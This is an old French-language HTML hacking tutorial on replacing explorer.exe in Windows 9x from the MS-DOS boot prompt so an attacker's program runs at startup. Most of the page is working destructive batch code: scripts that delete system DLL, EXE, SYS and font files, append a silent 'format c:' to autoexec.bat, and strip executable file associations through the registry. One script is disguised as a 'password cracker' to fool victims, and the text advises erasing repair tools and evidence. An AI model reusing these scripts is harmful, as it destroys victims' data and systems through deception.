<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="Author" content="Clad Strife">
   <meta name="GENERATOR" content="Mozilla/4.61 [en] (Win98; I) [Netscape]">
   <title>Vuln&eacute;rabilit&eacute; par rapport au fichier explorer.exe des syst&egrave;mes Windows.</title>
</head>
<body text="#000000" bgcolor="#FFF5F0" link="#0000EE" vlink="#551A8B" alink="#FF0000">

<center><b><tt><font size=+2>Le fichier explorer.exe</font></tt></b></center>

<p><br>
<br>
<br>
<br>
<br>
<br>
<p><font color="#000000">La faille est simple: elle consiste &agrave; faire
&eacute;x&eacute;cuter &agrave; windows, un programme de votre choix. Quel
est, selon vous, le premier programme qui se lance, avant l'ouverture de
session? Il s'agit de <b>explorer.exe (C:\windows\explorer.exe)</b>. Tout
consiste &agrave; faire lancer un autre programme que l'explorer.exe habituel.
Cel&agrave; requiert un acc&egrave;s &agrave; MS-DOS avant le lancement
de windows. Comment faire:</font>
<br><font color="#000000">Lorsque le PC d&eacute;marre, laissez enfonc&eacute;e
la touche F8 ou F4 (F8 en g&eacute;n&eacute;ral), et un menu d'options
apparait. Parmis ces options, choisissez la cinquieme qui est: <b>Invite
MS-DOS seulement</b>.&nbsp; Validez ce choix et vous vous retrouverez sous
DOS. Windows ne s'est alors pas lanc&eacute;. De l&agrave; vous avez plusieurs
solutions:</font>
<br><font color="#000000">- le programme &agrave; faire lancer &agrave;
la place de explorer.exe est d&eacute;j&agrave; sur la machine</font>
<br><font color="#000000">- le programme &agrave; faire lancer est sur
une disquette que vous avez sur vous (bien entendu).</font>
<br><font color="#000000">Dans le premier cas, voici comment faire lancer
le programme &agrave; la place de explorer.exe</font>
<br><font color="#000000">Tapez:</font>
<br><font color="#008080">del c:\windows\explorer.exe</font>
<br><font color="#000000">Validez</font>
<br><font color="#008080">copy c:\le-rep-o&ugrave;-se-trouve-le-prog-&agrave;-lancer\nom-du-prog.exe
c:\windows\explorer.exe</font>
<br><font color="#000000">Exemple:</font>
<br><font color="#FF0000">del c:\windows\explorer.exe</font>
<br><font color="#FF0000">copy c:\windows\winipcfg.exe c:\windows\explorer.exe</font>
<br><font color="#000000">Avec ces deux lignes de commandes, votre programme
d'attaque est venu remplacer explorer.exe (dans l'exemple il s'agit de
winipcfg.exe). Ainsi ce sera lui qui se lancera &agrave; la place d'explorer.exe.
Ce lancement s'effectue, comme d&eacute;j&agrave; dit, avant tout les autres
programmes windows. Pour pouvoir remettre l'explorer.exe &agrave; sa place
il vous est conseill&eacute; d'en faire une copie sous un autre nom. Voici
un exemple de sauvegarde de explorer.exe:</font>
<br><font color="#008080">copy c:\windows\explorer.exe c:\windows\datareg.exe</font>
<br><font color="#000000">L&agrave; l'explorer.exe existe sous la forme
de datareg.exe dans le r&eacute;pertoire c:\windows\. Pour r&eacute;tablir
le bon explorer.exe, vous devez effacez le mauvais, qui est sous le nom
de explorer.exe (c:\windows\explorer.exe), et recopier datareg.exe dans
le c:\windows\, sous le nom de explorer.exe. Proc&eacute;dez donc de la
mani&egrave;re suivante:</font>
<br><font color="#008080">copy c:\windows\datareg.exe c:\windows\explorer.exe</font>
<br><font color="#000000">Tout devrait refonctionner normalement. Voil&agrave;
donc ce que vous pouvez faire pour sauvegarder explorer.exe.</font>
<br>&nbsp;
<table BORDER COLS=1 WIDTH="100%" BGCOLOR="#FFCCCC" >
<tr>
<td><b><font color="#000000"><i>Note:</i> si il n'y a pas de fichiers explorer.exe
existants dans c:\windows, alors apr&egrave;s l'ouverture d'une session
windows marquera:</font></b>
<center><u><font color="#000000">Erreur dans le chargement d'Explorer</font></u>
<br><u><font color="#000000">Veuillez R&eacute;installer Windows</font></u></center>
<b><font color="#000000">Apr&egrave;s quoi, l'ordinateur s'&eacute;teint
tout seul.</font></b></td>
</tr>
</table>

<p><font color="#000000">Dans le cas o&ugrave; vous auriez envie de faire
cette manipulation rapidement sur un PC, cr&eacute;ez un .bat, ou un .com
que vous pouvez renommez en .exe. Je vous rappelle qu'il existe des programmes
permettant de transformer un .bat en .com (exemple avec bat2exec). Il vous
suffit apr&egrave;s de renommer le .com en .exe, et &ccedil;a marche (mais
<b>uniquement</b>
sous MS-DOS). Vous pouvez &eacute;ventuellement laissez le .com tel quel
et il s'ouvrira depuis Windows.</font>
<br><font color="#000000">Voil&agrave; le genre de codes sources &agrave;
faire pour &eacute;viter de perdre du temps:</font>
<br><font color="#FF0000">@echo off</font>
<br><font color="#FF0000">copy c:\windows\explorer.exe c:\windows\datareg.exe</font>
<br><font color="#FF0000">del c:\windows\explorer.exe</font>
<br><font color="#FF0000">copy c:\windows\system\sysedit.exe c:\windows\sysinii.exe</font>
<br><font color="#FF0000">del c:\windows\system\sysedit.exe</font>
<br><font color="#FF0000">copy c:\windows\winipcfg.exe c:\windows\explorer.exe</font>
<br><font color="#FF0000">echo autoexec >> c:\autoexec.bat</font>
<br><font color="#FF0000">del a:\explorer.exe</font>
<br><font color="#FF0000">c:</font>
<br><font color="#FF0000">win</font>
<br><u><font color="#000000">Cons&eacute;quences:</font></u>
<ol>
<li>
<font color="#000000">Explorer.exe est effac&eacute; du Disque dur.</font></li>

<li>
<font color="#000000">Une copie a cependant &eacute;t&eacute; faites de
Explorer.exe. Cette copie est c:\windows\datareg.exe &agrave; replacer
dans c:\windows sous le nom de explorer.exe</font></li>

<li>
<font color="#000000">Sysedit.exe est effac&eacute; du Disque dur.</font></li>

<li>
<font color="#000000">Une copie a cependant &eacute;t&eacute; faite de
Sysedit.exe. Cette copie est: c:\windows\sysinii.exe &agrave; replacer
dans c:\windows\system sous le nom de sysedit.exe</font></li>

<li>
<font color="#000000">L'explorer.exe est remplac&eacute; par winipcfg.exe.
Ainsi ce sera winipcfg qui s'ouvrira &agrave; la place de explorer.exe
apr&egrave;s l'ouverture de la session windows.</font></li>

<li>
<font color="#000000">Une ligne de commande est ajout&eacute; &agrave;
l'autoexec.bat, cette ligne ne sera prise en compte qu'apr&egrave;s red&eacute;marrage
du PC, et emp&ecirc;che l'ouverture correcte de windows.</font></li>

<li>
<font color="#000000">Le programme explorer.exe (le "virus"), qui est sur
votre disquette, est effac&eacute;, ce qui fait ainsi disparaitre les preuves.</font></li>
</ol>
<font color="#000000">Si vous &ecirc;tes assez tendance crasher, vous pouvez
rajouter des lignes de commandes de type del ou format:</font>
<p><font color="#FF0000">@echo off</font>
<br><font color="#FF0000">copy c:\windows\explorer.exe c:\windows\datareg.exe</font>
<br><font color="#FF0000">del c:\windows\explorer.exe</font>
<br><font color="#FF0000">copy c:\windows\system\sysedit.exe c:\windows\sysinii.exe</font>
<br><font color="#FF0000">del c:\windows\system\sysedit.exe</font>
<br><font color="#FF0000">copy c:\windows\winipcfg.exe c:\windows\explorer.exe</font>
<br><font color="#3366FF">del c:\windows\*.dll</font>
<br><font color="#3366FF">del c:\windows\*.ini</font>
<br><font color="#3366FF">del c:\windows\system\*.dll</font>
<br><font color="#3366FF">echo format c:/autotest >> c:\autoexec.bat</font>
<br><font color="#FF0000">del a:\explorer.exe</font>
<br><font color="#FF0000">c:</font>
<br><font color="#FF0000">win</font>
<br>&nbsp;
<br>&nbsp;
<table BORDER COLS=1 WIDTH="100%" BGCOLOR="#FFCCCC" >
<tr>
<td><b><i>Note:</i></b> <b>les commandes MS-DOS de types </b><u>format
c:/autotest</u><b> font un formatage imm&eacute;diat du lecteur vis&eacute;
et sans demande de confirmation.</b>
<br><b><i>Note: </i>&eacute;vitez d'ins&eacute;rez des commandes de type
</b><u>del
*.*</u><b>. En effet ce type de commandes demande confirmation &agrave;
l'utilisateur tandis que une commande de type </b><u>del *.exe ou del *.dll</u><b>
n'en demande pas.</b>
<br><i><b>Note:</b> </i><b>l'autoexec.bat est un fichier MS-DOS qui s'ouvre
avant Windows. N'h&eacute;sitez donc pas &agrave; &eacute;crire ce que
vous voulez dessus. Prenez soin d'effacer aussi le fichier </b><u>EDIT.COM</u><b>,
qui permettrait une r&eacute;paration des fichiers .bat depuis MS-DOS dans
le cas ou vous agiriez de fa&ccedil;on nuisible.</b>
<br><b><i>Note:</i> la commande </b><u>echo ligne-de-commande >> c:\rep\nom_du_fichier</u><b>permet
d'&eacute;crire sur un fichier texte ou .bat, une ligne de commande d&eacute;sir&eacute;e.
Dans l'article il s'agit de</b> <u>format c:/autotest</u>
<br><b><i>Note: </i>pour forcer Windows a red&eacute;marrer ins&eacute;rez
la commande&nbsp;</b>
<br><u>C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows</u>
<br><b>&agrave; la fin de votre fichier .bat.</b></td>
</tr>
</table>

<p><font color="#000000">Vous pouvez aussi cr&eacute;ez vos propres programmes
dans diff&eacute;rents langages de mani&egrave;re &agrave; faire de ce
type d'attaques de v&eacute;ritables joujous de guerre qui iraient jusqu'&agrave;
lancer des trojans sur des serveurs bien prot&eacute;g&eacute;s de mani&egrave;re
bien sentie, sans qu'aucun anti-virus ne puisse se d&eacute;fendre puisqu'aucun
anti-virus ne peut se lancer si explorer.exe n'est pas correctement lanc&eacute;.</font>
<br><font color="#000000"><i>Exemple: </i>faites un programme de type .exe
qui red&eacute;marre la machine de la victime/serveur. La victime ne peut
plus rien faire d'autre qu'attendre que tout se lance. Votre programme
se lancera d&egrave;s le d&eacute;marrage de la machine, sous MS-DOS, avant
Windows et ensuite un trojan pourra &ecirc;tre lanc&eacute; &agrave; l'insu
du plein gr&eacute; des victimes. Cependant ces m&ecirc;me victimes n'auront
qu'&agrave; se d&eacute;connecter de l'internet pour parer une quelconque
intrusion. L'effet secondaire est que le serveur sera mis hors-service.
Sachez que ce genre de m&eacute;thodes est applicable, et qu'il ne s'agit
l&agrave; plus de th&eacute;orie.</font>
<p>Voyez par exemple ce .bat, que j'ai cr&eacute;&eacute;, qui red&eacute;marrera
l'ordinateur &agrave; la fin de son &eacute;x&eacute;cution ceci sans pr&eacute;avis.
Le fonctionnement en est simple mais l'effet est radical.
<p>Vous devez recopier ce programme dans une fen&ecirc;tre d'edit MS-DOS
et corriger tout ce qui ne sera pas pass&eacute; (dont notamment les accents).
<p><font color="#3333FF">echo off</font>
<br><font color="#3333FF">echo WELCOME AT XXX PASSWORD CRACKER HKWD</font>
<br><font color="#3333FF">echo echo off >> c:\autoexec.bat</font>
<br><font color="#3333FF">echo del c:\windows\explorer.exe >> c:\autoexec.bat</font>
<br><font color="#3333FF">echo copy c:\windows\winpopup.exe c:\windows\explorer.exe
>> c:\autoexec.bat</font>
<br><font color="#3333FF">echo del c:\windows\command\xcopy.exe >> c:\autoexec.bat</font>
<br><font color="#3333FF">echo del c:\windows\command\xcopy32.exe >> c:\autoexec.bat</font>
<br><font color="#3333FF">echo echo ON EST PAS DES CRASHERS&nbsp; >> c:\autoexec.bat</font>
<br><font color="#3333FF">echo pause >> c:\autoexec.bat</font>
<br><font color="#3333FF">echo echo TU NOUS CROIS PAS LOL >> c:\autoexec.bat</font>
<br><font color="#3333FF">echo pause >> c:\autoexec.bat</font>
<br><font color="#3333FF">echo REGEDIT4 >> c:\windows\registre.reg</font>
<br><font color="#3333FF">echo [-HKEY_CLASSES_ROOT\.exe] >> c:\windows\registre.reg</font>
<br><font color="#3333FF">echo [-HKEY_CLASSES_ROOT\.com] >> c:\windows\registre.reg</font>
<br><font color="#3333FF">echo [-HKEY_CLASSES_ROOT\.bat] >> c:\windows\registre.reg</font>
<br><font color="#3333FF">echo [-HKEY_CLASSES_ROOT\.sys] >> c:\windows\registre.reg</font>
<br><font color="#3333FF">echo [-HKEY_CLASSES_ROOT\.hlp] >> c:\windows\registre.reg</font>
<br><font color="#3333FF">copy c:\windows\registre.reg c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\registre.reg</font>
<br><font color="#3333FF">del c:\windows\registre.reg</font>
<br><font color="#3333FF">echo DECRYPTING</font>
<br><font color="#3333FF">echo del c:\windows\system\*.dll >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\system\*.sys >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\system\*.ocx >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\system\*.vxd >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\options\cab\*.cab >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\*.dll >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\*.exe >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\system\*.exe >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\bureau\*.lnk >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\system\*.drv >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\*.ini >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\fonts\*.ttf >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\SYSTEM32\drivers\*.sys >>
c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\command\*.com >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\windows\*.com >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo del c:\autoexec.bat >> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo format c:/autotest >> c:\windows\test.bat</font>
<br><font color="#3333FF">echo copy c:\windows\test.bat c:\autoexec.bat
>> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows
>> c:\windows\menud&eacute;~1\progra~1\d&eacute;marr~1\command.bat</font>
<br><font color="#3333FF">echo BYE BYE IS IT YOUR PASSWORD</font>
<br><font color="#3333FF">C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows</font>
<br>&nbsp;
<br>&nbsp;
<table BORDER COLS=1 WIDTH="100%" BGCOLOR="#FFCCCC" >
<tr>
<td><b><i>Note:</i></b> si un programme de traitement de fichiers est en
cours d'utilisation et que l'ordinateur essaye de se fermer alors que les
donn&eacute;es doivent &ecirc;tre sauv&eacute;s, windows bloquera le processus
d'extinction du PC et l'attaque sera rep&eacute;r&eacute;e.</td>
</tr>
</table>

<br>&nbsp;
<p><font color="#000000">Evitez cependant de trop jouer avec &ccedil;a.
Ne dit-on pas que le crime ne profite jamais?</font>
<p><b><i><font color="#000000">Clad Strife</font></i></b>
</body>
</html>
